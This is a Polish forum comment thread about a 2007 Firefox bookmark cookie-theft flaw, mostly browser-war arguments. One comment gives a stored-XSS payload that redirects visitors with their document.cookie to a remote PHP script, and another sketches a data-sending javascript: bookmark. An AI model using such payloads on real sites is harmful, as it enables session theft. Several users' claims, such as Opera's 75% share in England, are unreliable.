Kolejna luka w Firefoksie

"W tym celu atakujący musi nakłonić ofiarę do dodania do zakładek odpowiednio spreparowanego linku, wejścia na stronę z której atakujący zamierza wykraść cookies a następnie wybrania z zakładek uprzednio dodanego linku..."

... musi jeszcze stanąć na głowie, zatańczyć z sąsiadką walca, zjeść kanapkę z nutellą i uderzyć głową w Pałac Kultury!

Standardowo - dziura, która jest, ale w zasadzie jej nie ma :P

opera rządzi!!!!!!!!!!
P.S.ostatnio mi coś nawala:-/zamyka się przy zamykaniu zakładki:(

Pamiętam jak jakieś 3-4 lata temu open sourcowcy krzykacze zarzekali się że jak FF stanie sie popularniejszy na pewno nie posypią sie dziury jak w IE. Okazuje się jednak że w stosunku do popularności IE ma mniej dziur niż FF.

Nieźle, gratulacje dla p. Michała. Teraz czekamy na łatkę i fanów Opery. Co do samej dziury trzeba sie nieźle namęczyc samemu, żeby ją uaktywnić..cieżko faktycznie taką sytuacje przewidzieć ;p

Btw. to do Operek ;) da się coś zrobić zeby Opera po wpisaniu (np. gmail) w pasku adresu zachowywała się tak jak FF? (porównajcie wyniki takiego działania z FF [otwiera gmail.com] Opera otwiera gmail.pl sprawdzcie obie strony zrozumiecie o co mi chodzi)

taka luka to nie luka. To tak jakby nakłaniać użytkownika to sformatowania partycji systemowej, rozwalenia rejestru albo wyłączenia antywirusa i ściągania paczek z wirusami z p2p. Ten pan niech się lepiej zajmie Vistą, żeby jak najwięcej dziur zdążyli załatać w SP1, a biednego Liska niech zostawi w spokoju :)

Jakoś nie widzę komentarzy przeciwników Internet Explorera! No cóż Firefox to dziura na dziurze i dziurą zakryta! :) Na szczęście mamy jeszcze Operę !!!

Czyli jak widać im popularniejszy soft tym więcej dziurek jest zauważanych.
Tak samo będzię z Linux-em.
I tak samo jest z Windows-em
Zaraz pewnie OPERA się bardziej spopularyzuje i co i kicha się okaże że też ma dziury.

:)

Co pewien czas czytamy, że wykryto nową lukę w Firefoksie, doczodzę do wniosku, że przeglądarka ta jest podobnie dziurawa co IE.

Czym się przejmować? Przecież tego Firefoxa to chyba już nikt nie używa.

tyle, ze dziury w firefoxie sa niegroznymi naduzyciami, ktore trudno wykorzystac, a IE podaje ci system na talerzu...

Uzywa bardzo duzo osob, a w newsie powinno byc jeszcze zaleznosc "zastepować " i wtedy luka bedzie grozna :D

@MacSen, @jarkis

To nie jest żadna "dziura". Michał Zalewski trochę te "dziury" wyciska na siłę, bo znalezione przez niego dziury (ta, jak i poprzednia dziura) wymagają naprawdę SPOREJ ingerencji ze strony użytkownika...

Ale to nawet lepiej - Mozilla szybko to załata i Firefox IMHO nadal pozostanie najbezpieczniejszą przeglądarką.

BTW.
Przypominam, że twórcy Opery ostatnio po cichu załatali TYSIĄCE mniejszych i większych dziurek - nawet nikt nie zwrócił na to uwagi. I to już nie pierwszy raz tak po kątach myszkują swoje dziury. Był na ten temat news na portalu.

coś mi się wydaje, że wykrywanie dziur w Firefoxie, jest antyreklamą promującą IE7 i Operę... chyba, że się mylę i tak się reklamuje pan Zalewski (bo na znajdywaniu dziur w IE to by się chyba nie wypromował).
Ja już zacząłem się zastanawiać nad operą :) Bo do IE nie przekona mnie nic - używałem i tyle syfów co przez niego przechodzi to nie chciałbym już więcej oglądać na kompie.

Dziura? Lol, lol, LOL...

Kolejny błąd, umożliwiający przejęcie zawartości cookies podczas ataku XSS lub niezabezpieczonego skryptu JS i przekazaniu go snifferowi.

Otóż przestępca umieszcza w niebadanym przez PHP polu formularza kod:
location='strona/plik.php?c='+document.cookie
Wystarczy, że admin lub inny użytkownik wejdzie na stronę, na której istnieje taki kod - automatycznie zawartość jego cookies zostanie przekazana dalej. :) Testowałem to (z localhost na zdalny serwer)! Przekażcie to twórcom Mozilli - może na BugZillę?

i tak podziwiam gościa, że chce mu się tak szukac dziur i niedociągnięć...

>.bo na znajdywaniu dziur w IE to by się chyba nie wypromował

a nie wpadles na to, ze on pro porstu uzywa ff i dlatego w nizm znajduje bledy?

"musi jeszcze stanąć na głowie, zatańczyć z sąsiadką walca, zjeść kanapkę z nutellą i uderzyć głową w Pałac Kultury!

Standardowo - dziura, która jest, ale w zasadzie jej nie ma :P"

@m4rciniak nie przesadzaj to jest do zrobienia. Nie takie rzeczy się robi żeby się gdzieś włamać.
Luka powinna być jak najszybciej załatana.

"Czyli jak widać im popularniejszy soft tym więcej dziurek jest zauważanych.
Tak samo będzię z Linux-em.
I tak samo jest z Windows-em"

@MacSen nie w tym jest problem. Problem jest w tym, że Microsoft nie łata tych dziur dostatecznie szybko. Luki wykryte w Linuksie są łatane prawie natychmiast.

"i tak podziwiam gościa, że chce mu się tak szukac dziur i niedociągnięć.."

Bardzo dobrze, że jest ktoś taki. FF tylko na tym zyskuje. Udawanie, że problem nie istnieje nie jest żadnym rozwiązaniem. Tak robi zwykle Microsoft.

@Nemo

tools - preferences, zakladka Advanced, pole network, guzik server name completion. zamien miejscami preferencje pl,com na com,pl

mozesz tez dopisac wlasne. byla tez jakas opcja, zeby opera przechodzila do wynikow wyszukiwania danego slowa, np w google im feeling lucky, ale na szybko nie pamietam jak to trzeba bylo wygrzebac. w interfejsie nie dalo sie tego ustawic w kazdym razie, tylko gdzies w opera:config

jak wiadomo Polak potrafi...

Tak , znam ten problem czesto mi sie tak robi

Uzywam Firefoksa od zarania dziejów i pierwsze co robie to w opcjach /Privacy/wyłaczam pierwsze 4
funkcje i jest zawsze OK

1) lcamtuf: szacunek!! i ze tez sie Tobie chce! podziwiam!!

2) do ludzi, ktorzzy nie rozumieja, dlaczego ostatnio tak duzo luk i dziur w FF sie wykrywa..

wiec ' sa to dziury, ktore moga byc wykorzystane tylko i wylacznie przy duzej wspolpracy uzytkownika ze skryptem.. wiec niejako dzialaja na wlasne zyczenie..
jak znam zycie, podobny motyw jak opisany da sie wykorzystac w IE7 czy w Operze.. kwestia przebrniecia przez silnik przegladarki..
i tu pojawia sie " czyli dostep do silnika..
w FF jest on niczym nieskrepowany, o ile tylko majacy dostep do zrodel ma wiedze o programowaniu.. a im wiedza lepsza, tym lepsze/szybsze wyszukiwanie luk i dziur..
co czasem owocuje wykryciem dziury typu jak powyzej..
z braku dostepu do kodu zrodlowego malo prawdopodne jest wykrycie podobnej luki u konkurencji..
zostaje tylko "przypadek" a nie analiza kodu - jak byc powinno..

tak wiec myslcie ludzie, co piszecie..:D

Phi, też mi dziura. Jak ktos ma dziury w mózgu to mu nawet nic preparować nie trzeba tylko linka podesłać. Wydaje mi się, że dla świadomego użytkownika przeglądarki Fx nie jest to żaden problem i nie trzeba się tym przejmować. I jakby ktoś miał wątpliwości to tak, nie interesuje mnie los użytkowników nieświadomych bo jak nie umiem jeździć samochodem to nim nie jeżdżę, a jak nie umiem się bić to nie szukam zaczepki. I tyle. Jak ktoś nie umie korzystać z internetu to niech potem nie zwala winy na Fx. Rozumiem, że z IE to może było różnie i tam nawet świadomośc podobno nie pomagała ;)

nie lubię firmy która tworzy tą przeglądarkę.
wcześniej sczerniali konkurencję tylko po to żeby w ten sposób pokazać jak wspaniałe ich produkty są. żeby zwiększyć swoją popularność nie pracowali nad swoim produktem tyle ile nad mówieniem że inne produkty są gorsze.
innymi słowy jedyne co u nich dobrze i bezpiecznie działa to czarny pijar.

ale krzyczycie, tylko że ta dziura ma być dzisiaj załatana, więc spodziewacie się firefoksa 2.0.0.2

@szon
Ciekawe że FF ma zyskiwać na lukach! Bardzo ciekawe. Zawsze jest tak jak w IE znajdą dziurę to jest afera, ale jak w FF to wtedy to już nie jest żadna dziura.

"Ciekawe że FF ma zyskiwać na lukach"

@abc bardzo cię szanuję, ale no nie wykazuj się publicznie takimi tekstami dla własnego dobra. Czym szybciej zostaną wykryte i załatane luki w FF tym dla niego lepiej.

@szon
A co grozisz mi??? Powiedziałem tylko prawdę tacy jak ty to uważają że jak czegoś używają to jest bez wad (właśnie okazało się że tak nie jest) a to z czego korzystają inni to śmieć. FF wcale nie jest bezpieczną przeglądarką. Najbezpieczniejsza jest Opera, choć obecnie z niej nie korzystam.

No bo w IE dziura = ktoś grzebie w twoim komputerze
a w Firefoxie dziura = sam z własnej głupoty pozwoliłeś wykrasć sobie cookies.

Ta dziura = PRAWIE JAK BŁAD

swoją drogą zapewne lcamtuf (autor jednego z bardziej znanych poradników na temat hackowania) nieźle zarobi, bo mozilla płaci kupę forsy za każdy wykryty błąd.

@ g ,gupi jesteś

FF, Opera, IE -wszystkie te programy mają luki, to normalne.
Ale w innych programach też są luki. Dlatego aby komputer był bezpieczny trzeba zminimalizować liczbę zainstalowanych programów.
Z każdym nowym programem wrzucamy do systemu nowe błędy i nowe luki.

Po co komu aż trzy przeglądarki(wiem, webmasterom ;) )? Ale do codziennych zastosowań starczy dwie- Opera, która ma klienta poczty(więc odpadają np. OE i Thunderbird ze swoimi dziurami).
A IE może nam służyć do obsługi niektórych opornych stron.

Pamiętajmy, że każdy nowy program na dysku to nowe potencjalne zagrożenie dla całego komputera i dla naszych danych.(szczególnie groźne mogą być wszelkie programy korzystające z Internetu, co jest oczywiste...)

@szon

Nie przesadzam - tej dziury po prostu nie ma i jestem przekonany, że nikomu ona nie zagraża.

"A co grozisz mi???"

@abc na litość boską nie grożę ci tylko chodziło mi o to żebyś się nie ośmieszał publicznie.

"acy jak ty to uważają że jak czegoś używają to jest bez wad (właśnie okazało się że tak nie jest) a to z czego korzystają inni to śmieć"

Gdzie ty coś takiego u mnie wyczytałeś?
Nie ma oprogramowania bez luk bo piszą je ludzie. a jak wiadomo nie ma ludzi nie omylnych. Jest tylko kwestia jak szybko luki są łatane.
O tym jak szybko są łatane w IE a jak w FF możesz się przekonać tu:

http://newsroom.chip.pl/news_archive.php?b=66368

Poza tym zadziwia mnie twoja agresja. Ja cię przecież nie atakuję w żaden sposób.

Apeluję do wszystkich forumowiczów o większą kulturę osobistą.

Nie wiem o co całe te krzyki. FF ma dziury i zaraz jest taki sam jak IE. Trochę zastanowienia. Kazdy program ma dziury. Nie ma ludzi idealnych i nie ma programów idealnych.
Cała sprawa rozbija się jednak o szybkość z jaką dziury są łatane. Polecam poczytac parę raportów na ten tamat. Dopiero później można wyrażać jakieś negatywne opinie o "dziurawym programie".

@abc - [[Zawsze jest tak jak w IE znajdą dziurę to jest afera, ale jak w FF to wtedy to już nie jest żadna dziura.]]
Po pierwsze - nie zawsze
Po drugie - są dziury i dziury. Zwróć uwagę ile czynności musi wykonać użytkownik żeby ta zadziałała. A większość w IE pozwala na wykonanie kodu BEZ udziału użytkownika i z dostępem do całego komputera (i tu też jest parę stopni bezpieczeństwa)

I znowu (jak przy ostatnich aktualnościach) dziura pewnie nie będzie działała jeśli mamy Dodatek o nazwie NoScript (polecam - dużo zalet ma ten plugin)

Właśnie odkryłem kolejną dziurę w FF!!!

JEŚLI UŻYTKOWNIK SAM ZROBI SOBIE ZAKŁADKĘ DO "javascript:var strona=document.innerHTML;function wyslij(ten_komp,serwer) { tu niezobrazowane cialo funkcji }; wyslij(0,1);"

WÓWCZAS FIREFOX JEŚLI OTWORZY SIĘ TĄ ZAKLADKE PODCZAS OGLADANIA JAKIEJS STRONY WYŚLE JEJ ZAWARTOŚĆ NA ZDALNY SERWER LUB/I ZAPISZE KOPIE NA KOMPUTERZE UŻYTKOWNIKA. WYWOLYWANA JEST TUTAJ FUNKCJA WYSLIJ, KTORA PRZY POMOCY document.write() UMIESZCZA NA STONIE ODWOLANIE DO ZDALNEGO KODU W PHP, KTORY MOZE TAKZE KRASC PLIKI I/LUB COOKIES.
PODATNE SĄ NA TO WSZYSTKIE PRZEGLĄDARKI OBSŁUGUJĄCE jAVASCRIPT - IE6, FF, OPERA, NETPOSITIVE Z BEOSA...

Czy Szanowna Redakcja również umieści to jako "kolejną lukę w firefoxie" ?

swoją drogą lcamtuf - złote dzicko minionej epoki telnetu przez chargen chyba się ostatnio nudzi, bo wymysla na sile bugi, ktorych nie ma. Bo czy bugiem jest dać jako odnośnik na stronie np. "javascript:window.scroll(0,0)" co przewija stronę na samą górę (do pkt 0,0). I jeśli ktoś na to kliknie i funkcja ta zostanie wywolana i wykonana, to to jest BUG (w ang. wg microsoftu: "feature") ???

Zapomniałem dodać, że jeśli kod wywolania mojego bugu zostanie umieszczony jako adres odnośnika, to również zostanie wywołany.

Ja tak trocje na inny temat zauważyłem, że IE 6 nie otwiera uszkodzonych plików jpg a mozilla i firefox sobie z tym radzą więc to jest kolejny powód wyzszości Firefoxa nad IE

@Assembler: Nie otwiera uszkodzonych, lecz jeśli nie poczekam, aż obraz się do końca otworzy, jego fragment ukrywa się i wyświetla się komunikat o błędzie.

CO Z BŁĘDEM, KTÓRY TUTAJ ZGŁOSIŁEM O 22.02.2007, 08:33??? Trzeba go gdzieś zgłosić.

najbardziej mnie rozśmiesza, gdy znów ludzie powracają do kwestii "w operze załatali tysiąc błędów" - haha, tylko, że to były błędy w interfejsie i działaniu, a nie w bezpieczeństwie. Nie mówcie głupot, że FireFox jest popularniejszy niż opera, gdyż np. w anglii 75% społeczeństwa używa właśnie Opery, która bądź co bądź NIE MA żadnych błędów w bezpieczeństwie (poczytajcie sobie dzieci najpierw bugtraq na securityfocus.com, a potem gadajcie bzdury). Opera jest też szybsza niż FF, więc temat, że FF jest lepsze uważam za zamknięty. Dziura jak dziura, można napisać prosty skrypt na stronę, który ją wykorzysta. Firefox ma więcej luk od IE. IE 7 od czasów opublikowania miało zaledwie 2 dziury (możecie nawet popatrzeć na Windows Update).

@szon | IPHASH : GQ-HX-VP-RI | 22.02.2007, 09:11

Prawie....czynie wielką różnice...

@sid
dzięki..

FF brakuje tylko wbudowanego wznawiania ściąganych plików, które ma opera, a tak..w sumie mam obie a IE6 siedzi zablokowany w Zone Alarmie :D ;)

BTw. Wszystko co mówicie to subiektywne opinie, każdy ma to co mu bardziej pasuje. (Obiektywizm NIE ISTNIEJE :P )Kurcze czy nie ma ludzi, którzy to rozumieją (wiem ze kilka takich osób jest tu, ale czy więcej?)

Mam obok siebie FF i Opere, Winde/ Gnu/Linuxa i nie ma lepsze gorsze..wiadomo że MS, najlepszych rzeczy nie robi ale cóż..robi je wygodnymi, (niby)bajeranckimi (vel nowy OS), który swoją drogą wygląda jak Gnu/Lin z Xgl ale nie wykorzystuje potencjału. No, ale ja nie o tym miałem ;P proponuje zainstalujcie ana próbę obie przeglądarki i pobawcie się trochę nimi..
Może ktoś poda linki do stron z takimi poradami/ciekawostkami(?) jak "sid" (dzięki jeszce raz), bo to mnie jakoś wnerwiało w operce, a nie chciało mi się szukać.

Huurrraaaa ! Firefox dziura ! Polecam Opera ! :)

"Prawie....czynie wielką różnice..."

@MacSen bardzo błyskotliwe.

hehe a zwolennicy FF mówią o niej "że jest najlepsza na świecie" i wogóle doskonała i bez dziur a tu proszę no i co powiecie?

@Respev
1. Skąd wiesz, że były to tylko błędy interfejsu?
Zadałem sobie trochę trudu i poczytałem trochę o tym, także na stronach Opery i nie było tam tak kategorycznych stwierdzeń, zauważyłem, że pośród tych 1000 błędów znajduje się też "błąd 100%" (i nie jest to błąd interfejsu), ale tylko w wersji dla Windows.
2. Opera 9.2 (kompilacja 557) jest wolniejsza od Minefielda 3.0a2pre, przynajmniej przy wyświetlaniu tej strony:)
3. "Nie mówcie głupot, że FireFox jest popularniejszy niż opera, gdyż np. w Anglii 75% społeczeństwa używa właśnie Opery"
Skąd masz takie informacje? Może podaj link, by rozwiać moje wątpliwości.
Dane statystyczne firm badawczych różnią się od rzeczywistości, ale nie o kilkaset procent.
A swoją drogą, to trzeba być niezłym socjotechnikiem, by wykorzystać tę lukę w FF.

@ szpieg_shoguna

"Skąd masz takie informacje? Może podaj link, by rozwiać moje wątpliwości.
Dane statystyczne firm badawczych różnią się od rzeczywistości, ale nie o kilkaset procent."

Skąd? Ano stąd, że w angli w wielu gazetach Opera jest promowana (czytałem również porównanie przeglądarek i ich popularność). Moja kuzynka pracuje w jednym z biurowców w Londynie. Cała firma korzysta z Opery, Openoffica oraz z Susełka. Podobnie z innymi firmami.

"1. Skąd wiesz, że były to tylko błędy interfejsu?
Zadałem sobie trochę trudu i poczytałem trochę o tym, także na stronach Opery i nie było tam tak kategorycznych stwierdzeń, zauważyłem, że pośród tych 1000 błędów znajduje się też "błąd 100%" (i nie jest to błąd interfejsu), ale tylko w wersji dla Windows." - link? O ile się nie mylę, nie opubliczniono changelogu Opery 9.2.

@Respev
"O ile się nie mylę, nie opubliczniono changelogu Opery 9.2."
Ale istnieją blogi...

U mnie w domu na wszystkich komputerach jest zainstalowana Opera, moja siostrzenica, siostra, mój brat i ja korzystamy z tej przeglądarki, która jest szeroko zachwalana w polskiej prasie komputerowej, ale jakoś nie widzę, żeby miało to większy wpływ na statystyki użytkowanych w Polsce przeglądarek.
Opera to dobry produkt, ale jej idealizowanie, dorabianie jakiejś ideologii do jej użytkowania czy wystawianie jej na ołtarze to, jakby to delikatnie powiedzieć, lekka przesada. Jak ktoś chce, to jej używa, jak mu nie odpowiada, to używa czegoś innego i nie jest tego powodu gorszy, głupszy czy zacofany - ma po prostu inne upodobania/wymagania.

Ooo kolejna luka ;p

Firefox ? Buahahahah !

Firefox to największe badziewie, gorszy od IE a przy Operze nie można wymieniać jego nazwy!

Swój pierwszy raz miałem 2 albo 3 lata temu,
podajże nazywał się produkt Mandrake i po kolejnym czasie używania ,przeniosłem się na suse jakieś ....:)
i po kolejnym czasie przeniosłem się na mandrivia 2007 powerpack wersja 64 bit ....

a że nie mam teraz jakieś cześci od kompa bo jest serwisie użwam inny komp z systemem MS windows VISTA :)

Gdyby nie to, że 50% użytkowników komputera to Microsoft Certified Next Clicker, którzy potrafią przechowywać kilka wirusów naraz i nawet o tym nie wiedzą, to żaden specjalista od spraw bezpieczeństwa nie potraktowałby tego poważnie. Jednak aby pani Krysia z PKS Świdnica czuła się pewnie i komfortowo należy tą niech będzie, dziurę, załatać.

@Cesar
Jeszcze coś ciekawego powiesz? "Microsoft Certified Next Clicker" - nie każdy traktuje komputer jako członka rodziny i powód do wojen ideologicznych, lecz jako narzędzie pracy.
"Jednak aby pani Krysia z PKS Świdnica czuła się pewnie i komfortowo należy tą niech będzie, dziurę, załatać."
No proste, masz zupełną rację. Po co łatać jakiekolwiek dziury, skoro wszyscy są takimi pr0 userami jak ty i nie przeszkadzają im żadne dziury, no nie?